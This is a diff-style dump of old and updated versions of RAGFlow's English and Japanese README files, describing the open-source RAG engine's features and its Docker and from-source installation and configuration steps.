### 🌱 **Grounded citations with reduced hallucinations**

- Visualization of text chunking to allow human intervention.
- Quick view of the key references and traceable citations to support grounded answers.

### 🍔 **Compatibility with heterogeneous data sources**

- Supports Word, slides, Excel, TXT, images, scanned copies, structured data, web pages, and more.

### 🛀 **Automated and effortless RAG workflow**

- Streamlined RAG orchestration catered to both personal and large businesses.
- Configurable LLMs as well as embedding models.
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.

## 🔎 System Architecture

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>

## 🎬 Get Started

### 📝 Prerequisites

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
  > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).

### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):

   > To check the value of `vm.max_map_count`:
   >
   > ```bash
   > $ sysctl vm.max_map_count
   > ```
   >
   > Reset `vm.max_map_count` to a value of at least 262144 if it is not.
   >
   > ```bash
   > # In this case, we set it to 262144:
   > $ sudo sysctl -w vm.max_map_count=262144
   > ```
   >
   > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
   >
   > ```bash
   > vm.max_map_count=262144
   > ```

2. Clone the repo:

   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   ```

3. Build the pre-built Docker images and start up the server:

   > Running the following commands automatically downloads the *dev* version of the RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.6.0`, before running the following commands.

   ```bash
   $ cd ragflow/docker
   $ chmod +x ./entrypoint.sh
   $ docker compose up -d
   ```

   > The core image is about 9 GB in size and may take a while to load.

4. Check the server status after having the server up and running:

   ```bash
   $ docker logs -f ragflow-server
   ```

   _The following output confirms a successful launch of the system:_

   ```bash
       ____                 ______ __
      / __ \ ____ _ ____ _ / ____// /____  _      __
     / /_/ // __ `// __ `// /_   / // __ \| | /| / /
    / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
   /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
                 /____/

   * Running on all addresses (0.0.0.0)
   * Running on http://127.0.0.1:9380
   * Running on http://x.x.x.x:9380
   INFO:werkzeug:Press CTRL+C to quit
   ```

   > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.

5. In your web browser, enter the IP address of your server and log in to RAGFlow.
   > With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

   > See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.

_The show is now on!_

## 🔧 Configurations

When it comes to system configurations, you will need to manage the following files:

- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.

You must ensure that changes to the [.env](./docker/.env) file are in line with what is in the [service_conf.yaml](./docker/service_conf.yaml) file.

> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.

To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.

> Updates to all system configurations require a system reboot to take effect:
>
> ```bash
> $ docker-compose up -d
> ```

## 🛠️ Build from source

To build the Docker images from source:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:dev .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

## 🛠️ Launch Service from Source

To launch the service from source, please follow these steps:

1. Clone the repository

   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   $ cd ragflow/
   ```

2. Create a virtual environment (ensure Anaconda or Miniconda is installed)

   ```bash
   $ conda create -n ragflow python=3.11.0
   $ conda activate ragflow
   $ pip install -r requirements.txt
   ```

   If your CUDA version is greater than 12.0, execute the following additional commands:

   ```bash
   $ pip uninstall -y onnxruntime-gpu
   $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
   ```

3. Copy the entry script and configure environment variables

   ```bash
   $ cp docker/entrypoint.sh .
   $ vi entrypoint.sh
   ```

   Use the following commands to obtain the Python path and the ragflow project path:

   ```bash
   $ which python
   $ pwd
   ```

   Set the output of `which python` as the value for `PY` and the output of `pwd` as the value for `PYTHONPATH`.

   If `LD_LIBRARY_PATH` is already configured, it can be commented out.

   ```bash
   # Adjust configurations according to your actual situation; the two export commands are newly added.
   PY=${PY}
   export PYTHONPATH=${PYTHONPATH}
   # Optional: Add Hugging Face mirror
   export HF_ENDPOINT=https://hf-mirror.com
   ```

4. Start the base services

   ```bash
   $ cd docker
   $ docker compose -f docker-compose-base.yml up -d
   ```

5. Check the configuration files

   Ensure that the settings in **docker/.env** match those in **conf/service_conf.yaml**. The IP addresses and ports for related services in **service_conf.yaml** should be changed to the local machine IP and ports exposed by the container.

6. Launch the service

   ```bash
   $ chmod +x ./entrypoint.sh
   $ bash ./entrypoint.sh
   ```

7. Start the WebUI service

   ```bash
   $ cd web
   $ npm install --registry=https://registry.npmmirror.com --force
   $ vim .umirc.ts
   # Modify proxy.target to 127.0.0.1:9380
   $ npm run dev
   ```

8. Deploy the WebUI service

   ```bash
   $ cd web
   $ npm install --registry=https://registry.npmmirror.com --force
   $ umi build
   $ mkdir -p /ragflow/web
   $ cp -r dist /ragflow/web
   $ apt install nginx -y
   $ cp ../docker/nginx/proxy.conf /etc/nginx
   $ cp ../docker/nginx/nginx.conf /etc/nginx
   $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
   $ systemctl start nginx
   ```

## 📚 Documentation

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/faq.md)

## 📜 Roadmap

See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)

## 🏄 Community

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)

## 🙌 Contributing

RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.

*Updated version of README.md:*
<div align="center">
<a href="https://demo.ragflow.io/">
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
</a>
</div>

<p align="center">
  <a href="./README.md">English</a> |
  <a href="./README_zh.md">简体中文</a> |
  <a href="./README_ja.md">日本語</a> |
  <a href="./README_ko.md">한국어</a>
</p>

<p align="center">
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
    </a>
</p>

<h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Document</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
</h4>

<details open>
<summary><b>📕 Table of Contents</b></summary>

- 💡 [What is RAGFlow?](#-what-is-ragflow)
- 🎮 [Demo](#-demo)
- 📌 [Latest Updates](#-latest-updates)
- 🌟 [Key Features](#-key-features)
- 🔎 [System Architecture](#-system-architecture)
- 🎬 [Get Started](#-get-started)
- 🔧 [Configurations](#-configurations)
- 🛠️ [Build from source](#-build-from-source)
- 🛠️ [Launch service from source](#-launch-service-from-source)
- 📚 [Documentation](#-documentation)
- 📜 [Roadmap](#-roadmap)
- 🏄 [Community](#-community)
- 🙌 [Contributing](#-contributing)

</details>

## 💡 What is RAGFlow?

[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.

## 🎮 Demo

Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>

## 🔥 Latest Updates

- 2024-09-13 Adds search mode for knowledge base Q&A.
- 2024-09-09 Adds a medical consultant agent template.
- 2024-08-22 Supports text-to-SQL statements through RAG.
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
- 2024-07-23 Supports audio file parsing.
- 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files and tables from Markdown files.
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.

## 🌟 Key Features

### 🍭 **"Quality in, quality out"**

- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
- Finds "needle in a data haystack" of literally unlimited tokens.

### 🍱 **Template-based chunking**

- Intelligent and explainable.
- Plenty of template options to choose from.

### 🌱 **Grounded citations with reduced hallucinations**

- Visualization of text chunking to allow human intervention.
- Quick view of the key references and traceable citations to support grounded answers.

### 🍔 **Compatibility with heterogeneous data sources**

- Supports Word, slides, Excel, TXT, images, scanned copies, structured data, web pages, and more.

### 🛀 **Automated and effortless RAG workflow**

- Streamlined RAG orchestration catered to both personal and large businesses.
- Configurable LLMs as well as embedding models.
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.

## 🔎 System Architecture

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>

## 🎬 Get Started

### 📝 Prerequisites

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
  > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).

### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144:

   > To check the value of `vm.max_map_count`:
   >
   > ```bash
   > $ sysctl vm.max_map_count
   > ```
   >
   > Reset `vm.max_map_count` to a value of at least 262144 if it is not.
   >
   > ```bash
   > # In this case, we set it to 262144:
   > $ sudo sysctl -w vm.max_map_count=262144
   > ```
   >
   > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
   >
   > ```bash
   > vm.max_map_count=262144
   > ```

2. Clone the repo:

   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   ```

3. Build the pre-built Docker images and start up the server:

   > Running the following commands automatically downloads the *dev* version of the RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.

   ```bash
   $ cd ragflow/docker
   $ chmod +x ./entrypoint.sh
   $ docker compose up -d
   ```

   > The core image is about 9 GB in size and may take a while to load.

4. Check the server status after having the server up and running:

   ```bash
   $ docker logs -f ragflow-server
   ```

   _The following output confirms a successful launch of the system:_

   ```bash
       ____                 ______ __
      / __ \ ____ _ ____ _ / ____// /____  _      __
     / /_/ // __ `// __ `// /_   / // __ \| | /| / /
    / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
   /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
                 /____/

   * Running on all addresses (0.0.0.0)
   * Running on http://127.0.0.1:9380
   * Running on http://x.x.x.x:9380
   INFO:werkzeug:Press CTRL+C to quit
   ```

   > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.

5. In your web browser, enter the IP address of your server and log in to RAGFlow.
   > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

   > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
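
   For illustration, a hypothetical `user_default_llm` section is sketched below; the factory name and key are placeholders, not values taken from this repository:

   ```yaml
   # docker/service_conf.yaml (hypothetical excerpt)
   user_default_llm:
     factory: 'OpenAI'        # the LLM factory you selected
     api_key: 'sk-xxxxxxxx'   # replace with your real API key
   ```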

_The show is now on!_

## 🔧 Configurations

When it comes to system configurations, you will need to manage the following files:

- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.

You must ensure that changes to the [.env](./docker/.env) file are in line with what is in the [service_conf.yaml](./docker/service_conf.yaml) file.

> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
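
As a minimal sketch of what "aligned" means here, a matching credential pair might look like the following; the keys and values are illustrative assumptions, so consult [./docker/README](./docker/README.md) for the authoritative list:

```yaml
# docker/service_conf.yaml (hypothetical excerpt)
mysql:
  password: 'infini_rag_flow'   # keep identical to MYSQL_PASSWORD in docker/.env
minio:
  password: 'infini_rag_flow'   # keep identical to MINIO_PASSWORD in docker/.env
```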

To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
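
For example, remapping the serving port to 8080 would look like the sketch below; the surrounding service keys are illustrative, only the `8080:80` mapping is the actual change:

```yaml
# docker/docker-compose.yml (hypothetical excerpt)
services:
  ragflow:
    ports:
      - 8080:80   # <YOUR_SERVING_PORT>:80
```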

> Updates to all system configurations require a system reboot to take effect:
>
> ```bash
> $ docker-compose up -d
> ```

## 🛠️ Build from source

To build the Docker images from source:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:dev .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

## 🛠️ Launch service from source

To launch the service from source:

1. Clone the repository:

   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   $ cd ragflow/
   ```

2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:

   ```bash
   $ conda create -n ragflow python=3.11.0
   $ conda activate ragflow
   $ pip install -r requirements.txt
   ```

   ```bash
   # If your CUDA version is higher than 12.0, run the following additional commands:
   $ pip uninstall -y onnxruntime-gpu
   $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
   ```

3. Copy the entry script and configure environment variables:

   ```bash
   # Get the Python path:
   $ which python
   # Get the ragflow project path:
   $ pwd
   ```

   ```bash
   $ cp docker/entrypoint.sh .
   $ vi entrypoint.sh
   ```

   ```bash
   # Adjust configurations according to your actual situation (the following two export commands are newly added):
   # - Assign the result of `which python` to `PY`.
   # - Assign the result of `pwd` to `PYTHONPATH`.
   # - Comment out `LD_LIBRARY_PATH`, if it is configured.
   # - Optional: Add Hugging Face mirror.
   PY=${PY}
   export PYTHONPATH=${PYTHONPATH}
   export HF_ENDPOINT=https://hf-mirror.com
   ```

4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):

   ```bash
   $ cd docker
   $ docker compose -f docker-compose-base.yml up -d
   ```

5. Check the configuration files, ensuring that:

   - The settings in **docker/.env** match those in **conf/service_conf.yaml**.
   - The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and the ports exposed by the container, as sketched below.
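
   A hypothetical **conf/service_conf.yaml** excerpt after this adjustment; the field names and ports shown are illustrative placeholders, so use the ports actually exposed in **docker/.env**:

   ```yaml
   # conf/service_conf.yaml (hypothetical excerpt for a source launch)
   es:
     hosts: 'http://127.0.0.1:9200'   # local IP + the port exposed by the Elasticsearch container
   mysql:
     host: '127.0.0.1'
     port: 3306                       # the port exposed by the MySQL container
   minio:
     host: '127.0.0.1:9000'           # the port exposed by the MinIO container
   ```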

6. Launch the RAGFlow backend service:

   ```bash
   $ chmod +x ./entrypoint.sh
   $ bash ./entrypoint.sh
   ```

7. Launch the frontend service:

   ```bash
   $ cd web
   $ npm install --registry=https://registry.npmmirror.com --force
   $ vim .umirc.ts
   # Update proxy.target to http://127.0.0.1:9380
   $ npm run dev
   ```

8. Deploy the frontend service:

   ```bash
   $ cd web
   $ npm install --registry=https://registry.npmmirror.com --force
   $ umi build
   $ mkdir -p /ragflow/web
   $ cp -r dist /ragflow/web
   $ apt install nginx -y
   $ cp ../docker/nginx/proxy.conf /etc/nginx
   $ cp ../docker/nginx/nginx.conf /etc/nginx
   $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
   $ systemctl start nginx
   ```

## 📚 Documentation

- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 Roadmap

See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)

## 🏄 Community

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 Contributing

RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
README_ja.md: 560 changed lines (@@ -1,271 +1,289 @@)

*Previous version of README_ja.md:*
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.6.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
## 💡 RAGFlow とは?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
|
||||
## 📌 最新情報
|
||||
|
||||
- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
|
||||
- 2024-05-15 OpenAI GPT-4oを統合しました。
|
||||
- 2024-05-08 LLM DeepSeek-V2を統合しました。
|
||||
- 2024-04-26 「ファイル管理」機能を追加しました。
|
||||
- 2024-04-19 会話 API をサポートします ([詳細](./docs/conversation_api.md))。
|
||||
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
|
||||
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
|
||||
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
|
||||
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
|
||||
- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
|
||||
- 2024-04-07 中国語インターフェースをサポートします。
|
||||
|
||||
|
||||

## 🌟 主な特徴

### 🍭 **"Quality in, quality out"**

- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
- 無限のトークンから"干し草の山の中の針"を見つける。

### 🍱 **テンプレートベースのチャンク化**

- 知的で解釈しやすい。
- テンプレートオプションが豊富。

### 🌱 **ハルシネーションが軽減された根拠のある引用**

- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。

### 🍔 **多様なデータソースとの互換性**

- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。

### 🛀 **自動化された楽な RAG ワークフロー**

- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
- カスタマイズ可能な LLM とエンベッディングモデル。
- 複数の想起と融合された再ランク付け。
- 直感的な API によってビジネスとの統合がシームレスに。

## 🔎 システム構成

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>

## 🎬 初期設定

### 📝 必要条件

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。

### 🚀 サーバーを起動

1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:

> `vm.max_map_count` の値をチェックするには:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> `vm.max_map_count` が 262144 以上でなければリセットする。
>
> ```bash
> # In this case, we set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
>
> ```bash
> vm.max_map_count=262144
> ```

2. リポジトリをクローンする:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```

3. ビルド済みの Docker イメージをダウンロードし、サーバーを起動する:

```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

> 上記のコマンドを実行すると、RAGFlow の開発版 Docker イメージが自動的にダウンロードされます。特定のバージョンの Docker イメージをダウンロードして実行したい場合は、docker/.env ファイルの RAGFLOW_VERSION 変数を見つけて対応するバージョンに変更してください。例えば RAGFLOW_VERSION=v0.6.0 として、上記のコマンドを実行してください。

> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。

4. サーバーを立ち上げた後、サーバーの状態を確認する:

```bash
$ docker logs -f ragflow-server
```

_以下の出力は、システムが正常に起動したことを確認するものです:_

```bash
        ____                 ______ __
       / __ \ ____ _ ____ _ / ____// /____  _      __
      / /_/ // __ `// __ `// /_   / // __ \| | /| / /
     / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
    /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
                  /____/

 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:9380
 * Running on http://x.x.x.x:9380
INFO:werkzeug:Press CTRL+C to quit
```
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。

5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。

> 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。

_これで初期設定完了!ショーの開幕です!_

## 🔧 コンフィグ

システムコンフィグに関しては、以下のファイルを管理する必要があります:

- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存しています。

[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。

> [./docker/README](./docker/README.md) には環境設定とサービスコンフィグの詳細な説明があります。そこに記載されている全ての環境設定が、[service_conf.yaml](./docker/service_conf.yaml) の対応するコンフィグと一致していることを必ず確認してください。

デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。

> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
>
> ```bash
> $ docker-compose up -d
> ```

## 🛠️ ソースからビルドする

ソースから Docker イメージをビルドするには:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.6.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

## 🛠️ ソースコードからサービスを起動する方法

ソースコードからサービスを起動する場合は、以下の手順に従ってください:

1. リポジトリをクローンします
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```

2. 仮想環境を作成します(Anaconda または Miniconda がインストールされていることを確認してください)
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
CUDA のバージョンが 12.0 以上の場合、以下の追加コマンドを実行してください:
```bash
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```

3. エントリースクリプトをコピーし、環境変数を設定します
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
以下のコマンドで Python のパスと ragflow プロジェクトのパスを取得します:
```bash
$ which python
$ pwd
```

`which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。

`LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。

```bash
# 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
# オプション:Hugging Face ミラーを追加
export HF_ENDPOINT=https://hf-mirror.com
```

4. 基本サービスを起動します
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```

5. 設定ファイルを確認します

**docker/.env** 内の設定が **conf/service_conf.yaml** 内の設定と一致していることを確認してください。**service_conf.yaml** 内の関連サービスの IP アドレスとポートは、ローカルマシンの IP アドレスとコンテナが公開するポートに変更する必要があります。

6. サービスを起動します
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```

## 📚 ドキュメンテーション

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/faq.md)

## 📜 ロードマップ

[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照

## 🏄 コミュニティ

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)

## 🙌 コントリビュート

RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
<div align="center">
<a href="https://demo.ragflow.io/">
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
